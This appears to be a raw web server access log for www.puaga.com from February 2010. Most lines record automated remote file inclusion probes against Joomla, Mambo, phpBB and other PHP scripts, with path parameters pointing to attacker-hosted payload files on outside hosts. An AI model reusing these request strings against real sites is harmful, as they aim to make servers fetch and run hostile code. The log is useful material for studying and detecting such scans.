200.93.147.154 - - [15/Feb/2010:04:00:01 -0800] "GET /logs/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:00:01 -0800] "GET /mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:00:01 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:00:01 -0800] "GET /mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:00:03 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:00:04 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:00:04 -0800] "GET /logs/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:00:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:00:06 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:00:09 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:04:00:57 -0800] "GET /logs/access_100111.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:04:01:23 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:04:01:24 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:02:10 -0800] "GET /logs/access_100118.log//mambatstaff.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:30 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:30 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:30 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:05:39 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:45 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:45 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:05:45 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:06:52 -0800] "GET /logs/access_100208.log%20%20///skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:06:52 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:06:52 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:06:56 -0800] "GET /logs/access_100210.log//com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:06:57 -0800] "GET /com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:04:06:57 -0800] "GET /logs//com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:04:07:05 -0800] "GET /logs/access_100119.log%20%20///skin/buzzard_espoon/setup.php?dir=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:47 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:47 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:48 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:07:51 -0800] "GET /logs//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:07:51 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [15/Feb/2010:04:07:51 -0800] "GET /module/?S=A HTTP/1.0" 200 1362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
61.100.181.217 - - [15/Feb/2010:04:07:54 -0800] "GET /login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:07:55 -0800] "GET /logs/access_100111.log%20%20//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:59 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:59 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:07:59 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:08:04 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:08:09 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:08:09 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:08:09 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:08:18 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:18 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:18 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:18 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:22 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.1.51 - - [15/Feb/2010:04:09:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:10:45 -0800] "GET /logs/access_100118.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:10:47 -0800] "GET /functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:10:48 -0800] "GET /logs//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:11:03 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:04:11:03 -0800] "GET /logs/access_100119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:06 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:06 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:06 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:09 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:09 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:09 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:24 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:24 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:24 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:32 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:33 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [15/Feb/2010:04:11:33 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:04:11:34 -0800] "GET /logs/access_100119.log//functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:11:45 -0800] "GET /logs//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:11:45 -0800] "GET /include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:11:46 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:12:24 -0800] "GET /logs/access_100204.log//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:12:24 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:12:24 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:04:12:24 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:12:27 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:12:28 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:04:12:28 -0800] "GET /logs/access_100112.log//include/bbs.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:13:02 -0800] "GET /logs/access_100111.log//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:13:40 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:13:40 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [15/Feb/2010:04:13:41 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
67.195.112.241 - - [15/Feb/2010:04:13:59 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:35 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:35 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:36 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:37 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:37 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:38 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:39 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:40 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:40 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:44 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:44 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:14:44 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:15:49 -0800] "GET /logs/access_100204.log//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:04:16:21 -0800] "GET /logs/access_100111.log//login.php?dir=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:32 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:32 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:32 -0800] "GET /logs/access_100111.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:33 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:33 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:04:16:33 -0800] "GET /logs/access_100111.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.160.100.82 - - [15/Feb/2010:04:16:54 -0800] "GET / HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:17:12 -0800] "GET /logs/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:17:12 -0800] "GET /logs/access_100107.log%20%20/mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:04:17:12 -0800] "GET /mcf.php?content=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:04:17:58 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/imagess/all.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
82.76.12.197 - - [15/Feb/2010:04:17:58 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.steklo-vsem.ru/imagess/all.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
78.110.50.102 - - [15/Feb/2010:04:18:14 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:18:50 -0800] "GET /logs/access.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:04:18:55 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
